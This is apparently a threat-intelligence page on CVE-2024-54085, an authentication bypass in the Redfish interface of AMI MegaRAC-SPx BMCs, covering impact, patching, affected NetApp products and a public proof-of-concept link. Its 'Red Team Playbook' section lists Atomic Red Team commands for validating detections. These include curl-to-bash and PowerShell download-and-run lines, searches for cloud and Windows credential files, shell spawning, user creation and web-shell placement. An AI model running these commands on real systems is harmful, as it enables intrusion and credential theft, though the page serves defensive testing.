CVE-2024-54085
Overview
The vulnerability is an authentication bypass in the Baseboard Management Controller (BMC) of AMI MegaRAC-SPx, specifically within the Redfish Host Interface. The root cause lies in improper validation of authentication tokens or credentials, allowing unauthorized remote access to management functions. This flaw affects the Redfish API implementation in the BMC firmware, enabling attackers to circumvent normal authentication mechanisms.
Vulnerability Description
AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.
Impact
An unauthenticated remote attacker can gain full administrative access to the BMC management interface via the Redfish API. This access enables them to manipulate system configurations, extract sensitive data, disrupt system availability, and compromise integrity. No authentication or user interaction is required, making exploitation straightforward in exposed environments. The business impact includes potential data breaches, unauthorized control over hardware management, and disruption of critical infrastructure operations.
Solution
AMI has released patches addressing this authentication bypass in the MegaRAC-SPx firmware as detailed in advisory AMI-SA-2025003. Users should update affected firmware versions to the latest release provided by AMI. The advisory at https://go.ami.com/hubfs/Security%20Advisories/2025/AMI-SA-2025003.pdf contains step-by-step patch instructions and version details. Applying these updates is the primary mitigation; no workarounds are officially recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in AMI’s SPx and associated with the BMC (Baseboard Management Controller) is a critical security flaw that allows an attacker to bypass authentication remotely through the Redfish Host Interface. This issue arises from insufficient validation mechanisms within the interface, enabling unauthorized access to sensitive system controls and configurations. The Redfish API, designed for managing and using hardware in a data center environment, is particularly vulnerable due to its reliance on proper authentication protocols. When these protocols are compromised, attackers can exploit the vulnerability to gain administrative access, leading to severe consequences for the integrity and confidentiality of the system.
Attack vectors for this vulnerability are particularly concerning due to the remote nature of the exploitation. An attacker can initiate an attack from anywhere with internet access, making it difficult to defend against. The exploitation could involve sending crafted requests to the Redfish API, which, if successful, would allow the attacker to manipulate system settings, access sensitive data, or even disable critical services. Scenarios may include unauthorized firmware updates, configuration changes that weaken security postures, or the introduction of malware into the system. The potential for lateral movement within a network is significant, as gaining access to one BMC could lead to further compromises across interconnected systems.
The real-world impact of this vulnerability is profound, particularly for organizations relying on the affected products for their infrastructure management. A successful exploitation could result in a complete loss of confidentiality, integrity, and availability of critical systems. For businesses, this translates into not only immediate operational disruptions but also long-term reputational damage, regulatory fines, and potential legal liabilities. The risk is exacerbated in environments where sensitive data is processed or stored, such as financial institutions, healthcare providers, and government agencies. The financial implications of a breach can be staggering, with estimates suggesting that the costs associated with data breaches can reach millions of dollars, factoring in recovery efforts, legal fees, and lost business.
To detect and mitigate this vulnerability, organizations must adopt a multi-layered security approach. Regular security assessments and penetration testing should be conducted to identify potential weaknesses in the Redfish API and BMC configurations. Implementing robust logging and monitoring solutions can help detect unauthorized access attempts, allowing for timely responses to potential threats. Furthermore, organizations should ensure that they are running the latest firmware versions and apply security patches as soon as they are available. Network segmentation can also play a crucial role in limiting the exposure of critical systems to external threats, reducing the attack surface available to potential adversaries.
In conclusion, the vulnerability affecting AMI’s SPx and the BMC through the Redfish Host Interface represents a significant risk to organizations utilizing these systems. The ability for an attacker to bypass authentication remotely poses serious threats to the confidentiality, integrity, and availability of critical infrastructure. Proactive measures, including regular updates, security assessments, and monitoring, are essential to mitigate the risks associated with this vulnerability. Organizations must remain vigilant and responsive to emerging threats to safeguard their systems and data from exploitation.
CSURFACE threat intelligence has detected a marked escalation in the exploitability potential of CVE-2024-54085, as evidenced by a substantial increase in the Exploit Prediction Scoring System (EPSS) score, which has surged by over 340%. This upward trend is further corroborated by a rapid rise in exploit-related activity within the past week, signaling growing interest and capability among threat actors to leverage this vulnerability. The recent addition of CVE-2024-54085 to the Known Exploited Vulnerabilities (KEV) catalog underscores its heightened priority for adversaries and defenders alike. Moreover, the emergence of new proof-of-concept exploits publicly available on code repositories amplifies the risk landscape, lowering the barrier for exploitation attempts. Although ransomware group involvement remains unconfirmed, the vulnerability’s critical nature and expanding exploitability profile necessitate heightened vigilance. Consequently, the threat level associated with this vulnerability has escalated from a theoretical concern to an imminent operational risk, demanding increased attention in threat monitoring and incident response frameworks.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ami | Megarac Sp-X | All |
cpe:2.3:o:ami:megarac_sp-x:*:*:*:*:*:*:*:*
|
|
|
Ami | Megarac Sp-X | All |
cpe:2.3:o:ami:megarac_sp-x:*:*:*:*:*:*:*:*
|
|
|
Netapp | H300s Firmware | N/A |
cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | H500s Firmware | N/A |
cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | H700s Firmware | N/A |
cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | H410s Firmware | N/A |
cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | H410c Firmware | N/A |
cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | Sg6160 Firmware | N/A |
cpe:2.3:o:netapp:sg6160_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | Sgf6112 Firmware | N/A |
cpe:2.3:o:netapp:sgf6112_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | Sg110 Firmware | N/A |
cpe:2.3:o:netapp:sg110_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | Sg1100 Firmware | N/A |
cpe:2.3:o:netapp:sg1100_firmware:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Mr-Zapi/CVE-2024-54085
Just poc for CVE 2024-54085
|
Mr-Zapi | 2 | 1 | 2025-06-29 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.